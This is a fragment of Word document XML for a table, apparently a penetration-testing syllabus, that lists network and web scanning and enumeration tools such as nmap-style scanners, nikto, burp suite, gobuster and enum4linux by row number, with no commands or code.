            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0533BAA4" w14:textId="66180ED1" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2C8BCA98" w14:textId="4EA5BE06" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="09E7F8B9" w14:textId="0FBB1FB8" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="233D79F8" w14:textId="51654741" w:rsidR="006E4E41" w:rsidRDefault="00F57EA9" w:rsidP="00F57EA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="2160"/>
                <w:tab w:val="left" w:pos="2987"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006E4E41">
              <w:t>nbtscan</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> | netview</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="7D475CD8" w14:textId="77777777" w:rsidTr="00F60CAD">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="24676458" w14:textId="1981D820" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2D8137D2" w14:textId="5792EF65" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="51474FD3" w14:textId="6D4B016B" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37CE3801" w14:textId="47F8FE76" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>firewall evasion techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="65164B93" w14:textId="77777777" w:rsidTr="00F60CAD">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7EB82BC3" w14:textId="1F664AB1" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7A73CAC7" w14:textId="0FEDCE25" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="473726B5" w14:textId="193599AC" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29D4D5AE" w14:textId="6C255AAE" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>unicornscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="3029BDFA"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2095B7D8" w14:textId="1662AE7F"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583A0E89" w14:textId="4A21AF0D" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>46</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2ABA8C32" w14:textId="65D58798"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51A132E1" w14:textId="3FD70823" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nikto</w:t>
            </w:r>
            <w:r w:rsidR="00562167">
              <w:t xml:space="preserve"> | skipfish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="0E34DA17"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2D79EA56" w14:textId="6A471240"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02DC9C13" w14:textId="44F0C2AF" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="391FAA07" w14:textId="4602FD0F"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0ECA9EA5" w14:textId="4C2E7D01" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>burp suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="6EF4B693"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1A8A29B6" w14:textId="60FBB25F"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416ED96C" w14:textId="6457422F" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5497E7D0" w14:textId="33F80EE9"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62A4FFC3" w14:textId="47F507CF" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>owasp zap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="42798836" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="734FD5E4" w14:textId="216D3800"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4144CEE7" w14:textId="5C6C6FE7" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="58CD85BC" w14:textId="1A0CB59C"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5F906B84" w14:textId="4124E103" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="413A5EDD"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5F6B6B08" w14:textId="7D7D956D"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45A94C14" w14:textId="6DE1E412" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="36F6048C" w14:textId="7C081E43"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171950B8" w14:textId="12D74E3E" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidRPr="00815DFE">
              <w:t>eroxbuster</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> |</w:t>
            </w:r>
            <w:r w:rsidRPr="00815DFE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="00815DFE">
              <w:t xml:space="preserve">irsearch </w:t>
            </w:r>
            <w:r>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidRPr="00815DFE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="00815DFE">
              <w:t>irbuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="4C75902E"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383BA1B2" w14:textId="69909D4A"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62B6EA07" w14:textId="6AD3C5F6" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1E3CE982" w14:textId="188D3264"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21D6E756" w14:textId="001213A6" w:rsidR="006E4E41" w:rsidRPr="00860A91" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>enum4linux</w:t>
            </w:r>
            <w:r w:rsidR="00F57EA9">
              <w:t xml:space="preserve"> | pstools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="107BA380"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41FE94B6" w14:textId="0C8DA6C3"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5E9BD6B1" w14:textId="11BFC286" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>52</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1B883692" w14:textId="33A12500" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1213"/>
              </w:tabs>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53A23297" w14:textId="6D2D9EAE" w:rsidR="006E4E41" w:rsidRPr="00860A91" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00860A91">
              <w:t>snmp-check (</w:t>
            </w:r>
            <w:r>
              <w:t>SNMP</w:t>
            </w:r>
            <w:r w:rsidRPr="00860A91">
              <w:t xml:space="preserve"> enum)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="7573FD49" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="58CC6D52" w14:textId="20DDA569"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358AC086" w14:textId="137D69D1" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2708B770" w14:textId="6F360FC8" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1213"/>
              </w:tabs>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1472069A" w14:textId="1D22CB1C" w:rsidR="006E4E41" w:rsidRPr="00860A91" w:rsidRDefault="00CC375B" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ldapsearch </w:t>
            </w:r>
            <w:r w:rsidR="006E4E41">
              <w:t>(LDAP enum)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> | ntptrace (NTP enum)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="36C26E06" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7A5A3874" w14:textId="5778D0AA"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7234BC23" w14:textId="3B157D0F" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6C22909C" w14:textId="24900F59"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0512A14B" w14:textId="0D7AA578" w:rsidR="006E4E41" w:rsidRPr="00356624" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00356624">
              <w:t>SuperEnum (NFS enum)</w:t>
            </w:r>
            <w:r w:rsidR="00AF373A">
              <w:t xml:space="preserve"> | rpcinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="18DD094D" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3235CCC7" w14:textId="4AFFA268"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54FDBE2A" w14:textId="6F231DE8" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2575433A" w14:textId="369107C7"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1EA0C61D" w14:textId="768128FD" w:rsidR="006E4E41" w:rsidRPr="00356624" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00356624">
              <w:t>dig (DNS enum)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="792E516B" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3CA5D526" w14:textId="4C064426"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40EEF20A" w14:textId="62F15236" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>56</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29C83E4E" w14:textId="6009F7B5"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020AF38E" w14:textId="0F3E72F8" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00356624">
              <w:t>RPC, SMB and FTP Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4E41" w14:paraId="72FB489A" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="70928D94" w14:textId="35E1CCB1" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41-69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2BF7AB28" w14:textId="1685D207" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>57</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="414E4C25" w14:textId="692A3B45" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Port, Service and Web Page Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="73CBF823" w14:textId="5802A5DE" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>wpscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
